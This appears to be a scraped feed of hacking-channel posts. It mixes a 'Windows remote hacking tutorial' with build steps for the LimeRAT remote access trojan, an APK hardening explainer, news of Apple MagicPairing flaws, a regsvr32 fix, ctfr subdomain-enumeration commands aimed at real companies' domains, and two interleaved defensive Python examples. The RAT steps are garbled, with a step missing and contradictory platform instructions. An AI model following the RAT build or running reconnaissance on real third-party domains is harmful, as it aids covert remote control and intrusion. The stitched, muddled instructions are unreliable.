UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform which collects & analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Windows remote hacking tutorial:
> LimeRAT | Simple, yet powerful remote administration tool for Windows (RAT)
T.me/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Download the zip file on your Android or Linux

2) Unzip in a non-root folder

3) Open "LimeRAT.sln"

4) Set Compiler to "Release" mode

5) On Solution Explorer, Right click on "Solution LimeRAT Project" and press "Rebuild Solution"

7) Everything will be under "\Project_EXE\Release"

8) Convert stub.exe to stub.il, using Ildasm

🦑 Creating plugin example:

VB.NET
'Easy to create a DLL plugin
Public Class Main
'Simple Msgbox
Public Shared Sub CN(ByVal H As String, ByVal P As Integer, ByVal K As String, ByVal SP As String, ByVal PW As String, ByVal FP As String, ByVal HW As String, ByVal BT As String, ByVal PB As String)

Msgbox("Hello Client!")

Send("MSG" + SPL + "Hello Server!")
'Client will send msg back to server, MSG will be shown in [LOG] Tab

End Sub
End Class

@UnderCodeOfficial

🦑 Why APK encryption and hardening:
> Android applications are mainly developed in Java
instagram.com/UnderCodeTesting
🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> They are easily cracked

> The impact of cracking:

> Code or key interfaces are exposed

> The app may even be repackaged and released by others, with advertisements and viruses included

> This means huge risks for companies and users

> The most convenient and effective way to deal with cracking: reinforcement

> Through reinforcement, decompilation and secondary packaging can be prevented to a certain extent

Some other reasons

> For learning purposes, I want to understand, analyze, and learn the internal design and code logic of an Android app

> So I need to decompile and crack it

> So, to prevent others from cracking an app, it is necessary to encrypt and strengthen it

> But reinforcement has some disadvantages:

> Impact on the application after strengthening: size and startup speed

> Compatibility: the app must run normally on all platforms without crashing

> The cost: some reinforcement schemes charge fees

> Customer service response speed: some platforms respond at different speeds when problems occur after encryption

Written by UnderCode

🦑 How to decompile and encrypt an APK package in Android security > Your first step for cracking - or editing code...

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :


1) The first one: code obfuscation technology (ProGuard). This technology obfuscates the code to reduce its readability after decompilation, but it cannot prevent packing (shelling), in which code such as fee collection, advertising, and viruses is added. A careful person can still reverse-analyze the code, so the technology does not fundamentally solve the cracking problem; it only increases the difficulty of cracking.


2) The second kind: signature comparison technology. This technology mainly prevents packing, but the risk of reverse code analysis still exists. It also cannot completely solve the problem of being packed: if the cracker comments out the signature comparison code and compiles the app again, the protection is cracked.

3) The third type: NDK .so dynamic library technology. All the important core code is put in C files, compiled into a .so dynamic library with the NDK, and then called through JNI. Although this technology can protect the core code, the risk of being packed still exists.

4) The fourth type: dynamic loading technology, which is relatively mature in Java but has not yet been fully utilized in Android.
Fifth: use of a third-party platform

This post mainly explains the fourth method. This technology can effectively prevent reverse analysis, cracking, and packing. The dynamic loading technology is divided into the following steps:

5) Compile the core code into a jar package containing a dex file

6) Encrypt the jar package
Use the NDK to decrypt it at the main entry point of the program
Then use a ClassLoader to dynamically load the jar package
Use reflection to set this ClassLoader as the system's ClassLoader.

🦑 The main advantages are:

1. The core code is in the encrypted jar, so the cracker cannot extract the class files. If the cracker obtains the encryption key, that is a security issue on another level.

2. This technology can also effectively prevent packing. The code is dynamically loaded, so the cracker's shell program cannot be added to the encrypted jar package. Even if the cracker injects a shell program entry, the shell program is not in the ClassLoader's jar package, so it cannot be executed unless the cracker replaces the ClassLoader jar package and turns off the NDK decryption code. But what is then installed on the mobile phone is no longer our application, and users will definitely uninstall it.

Written by Undercode
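Item 2 above relies on the APK's signature to reveal packing. As an added illustration (not code from the original post), this Python example checks the per-file SHA-256 digests that JAR-style (v1) signing records in META-INF/MANIFEST.MF against the files actually in the archive. The sample archives are constructed, and validation of the signing certificate itself is assumed to happen elsewhere.

```python
import base64, hashlib, io, zipfile

def b64_sha256(data):
    return base64.b64encode(hashlib.sha256(data).digest()).decode()

def parse_manifest(text):
    """Return {entry name: base64 SHA-256 digest} from a JAR-style manifest."""
    # Lines over 72 bytes are folded onto continuation lines that start with a space.
    unfolded = text.replace("\r\n", "\n").replace("\n ", "")
    digests = {}
    for section in unfolded.split("\n\n"):
        fields = dict(l.split(": ", 1) for l in section.split("\n") if ": " in l)
        if "Name" in fields and "SHA-256-Digest" in fields:
            digests[fields["Name"]] = fields["SHA-256-Digest"]
    return digests

def audit_apk(apk_bytes):
    """Compare each archive entry with the digest recorded when the APK was signed."""
    report = {"modified": [], "unsigned": [], "missing": []}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        signed = parse_manifest(apk.read("META-INF/MANIFEST.MF").decode())
        present = [n for n in apk.namelist() if not n.startswith("META-INF/")]
        for name in present:
            if name not in signed:
                report["unsigned"].append(name)   # file added after signing
            elif signed[name] != b64_sha256(apk.read(name)):
                report["modified"].append(name)   # content changed after signing
    report["missing"] = sorted(set(signed) - set(present))
    return report

def build_sample(files, manifest_from=None):
    """Constructed archive; digests are taken from manifest_from (default: files)."""
    manifest = "Manifest-Version: 1.0\r\n\r\n"
    for name, data in (manifest_from or files).items():
        manifest += f"Name: {name}\r\nSHA-256-Digest: {b64_sha256(data)}\r\n\r\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", manifest)
        for name, data in files.items():
            z.writestr(name, data)
    return buf.getvalue()

# Constructed sample contents, not taken from any real application.
ORIGINAL = {"classes.dex": b"original code", "res/layout/main.xml": b"<LinearLayout/>"}
REPACKED = {**ORIGINAL, "classes.dex": b"original code + ad SDK", "assets/extra.bin": b"added"}

if __name__ == "__main__":
    print(audit_apk(build_sample(ORIGINAL)))
    print(audit_apk(build_sample(REPACKED, manifest_from=ORIGINAL)))
```

A repackager who re-signs the APK regenerates these digests, so a clean report still has to be paired with a comparison of the signing certificate against the developer's known one.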
Forwarded from Backup Legal Mega
🦑 Apple's Bluetooth protection framework MagicPairing revealed to have 10 0-day vulnerabilities that were not fixed

> Recently, researchers from the University of Darmstadt in Germany examined the MagicPairing protocol and found ten publicly disclosed defects across its three implementations (iOS, macOS and RTKIT). These defects have not yet been resolved.

> Apple Bluetooth protection framework: MagicPairing protocol

MagicPairing is a proprietary Apple protocol that provides seamless pairing, for example between a user's AirPods and all of their Apple devices, by synchronizing keys through Apple's cloud service iCloud. The ultimate goal of the MagicPairing protocol is to derive a Bluetooth link key (LK) for use between a single device and the AirPods. A new LK is created for each connection, which effectively shortens the lifetime of each LK.
🦑 When a new or reset pair of AirPods is first paired with an Apple device that belongs to an iCloud account, Secure Simple Pairing (SSP) is used. All subsequent connections between the AirPods and devices connected to the iCloud account use the MagicPairing protocol as the pairing mechanism. MagicPairing contains multiple keys and derivation functions. It relies on the Advanced Encryption Standard (AES) in Synthetic Initialization Vector (SIV) mode for authentication and encryption.

> The general logic of MagicPairing can be integrated into any IoT-based ecosystem, which increases its relevance to the entire security community.

> The MagicPairing protocol overcomes two shortcomings of Bluetooth device pairing: poor scalability and a security model that collapses easily. (If the permanent key, Link Layer or Long-Term Key, is compromised, the model collapses.)

> However, the researchers used code called ToothPicker to perform wireless fuzzing and in-process fuzzing and found 8 MagicPairing and 2 L2CAP vulnerabilities, which can cause crashes, CPU overload, and paired device associations. According to foreign media reports, the information was disclosed between October 30, 2019 and March 13, 2020, and has not yet been determined
🦑 "Because MagicPair is used before pairing and encryption, it provides a huge zero-click wireless attack surface. We found that all different implementations have different problems, including lock-in attacks and denial of service that can cause 100% CPU load. These issues were discovered during the general wireless test and the in-process fuzzing test on iOS."

@iUndercode
> full report written by iUndercode

🦑 How to solve the failure to call DllRegisterServer on Win10 64-bit?
instagram.com/undercodeTesting


1) Press the Win + X keys on the keyboard to bring up the commonly used commands.


2) Select "Command Prompt (Admin)".

3) Then enter "regsvr32 c:\Windows\SysWOW64\comdlg32.ocx" in the Command Prompt.

4) After entering the command, press Enter to confirm. After a while, a prompt reports success, which means the registration has succeeded.

Written by Undercode
🦑 Yesterday we posted 40 hacking tools for 2020; as an extra one, we present this:

🦑 Abusing Certificate Transparency logs to get the subdomains of HTTPS websites.
t.mE/UndercodeTesting

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/UnaPibaGeek/ctfr.git

2) cd ctfr

3) pip3 install -r requirements.txt

4) python3 ctfr.py --help

-d --domain [target_domain] (required)
-o --output [output_file] (optional)

5) Examples:

$ python3 ctfr.py -d starbucks.com
$ python3 ctfr.py -d facebook.com -o /home/shei/subdomains_fb.txt

✅ VERIFIED BY UNDERCODE
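Seen from the defending side, the same Certificate Transparency data shows which of your own hostnames are publicly discoverable. The Python example below is added here and is not part of ctfr; it assumes CT search results in crt.sh-style JSON (a `name_value` field holding newline-separated DNS names), and the records and the asset inventory are constructed.

```python
import json

# Constructed sample in the assumed crt.sh-style shape; not real log entries.
SAMPLE_CT_JSON = json.dumps([
    {"issuer_name": "C=US, O=Example CA", "not_before": "2020-03-01T00:00:00",
     "name_value": "www.example.com\nexample.com"},
    {"issuer_name": "C=US, O=Example CA", "not_before": "2020-04-02T00:00:00",
     "name_value": "*.dev.example.com\nVPN.example.com"},
    {"issuer_name": "C=US, O=Other CA", "not_before": "2020-04-20T00:00:00",
     "name_value": "jenkins-old.example.com\nexample.com.evil.test"},
])

def names_in_scope(ct_json, domain):
    """Map each hostname under `domain` to the set of issuers that certified it."""
    domain = domain.lower().rstrip(".")
    found = {}
    for record in json.loads(ct_json):
        for raw in record.get("name_value", "").splitlines():
            name = raw.strip().lower().rstrip(".")
            # Accept the domain itself or a true subdomain; a bare endswith(domain)
            # would also match look-alikes such as notexample.com.
            if name == domain or name.endswith("." + domain):
                found.setdefault(name, set()).add(record.get("issuer_name", "?"))
    return found

def unexpected_names(found, inventory):
    """Names published in CT that the asset inventory does not account for."""
    known = {h.lower() for h in inventory}

    def covered(name):
        # A wildcard entry is covered when its parent zone is in the inventory.
        return name in known or (name.startswith("*.") and name[2:] in known)

    return sorted(n for n in found if not covered(n))

if __name__ == "__main__":
    inventory = ["example.com", "www.example.com", "vpn.example.com", "dev.example.com"]
    found = names_in_scope(SAMPLE_CT_JSON, "example.com")
    for name in unexpected_names(found, inventory):
        print(name, sorted(found[name]))
```

Names that appear here but not in the inventory are candidates for decommissioning, and an issuer you do not use is worth checking against your CAA records.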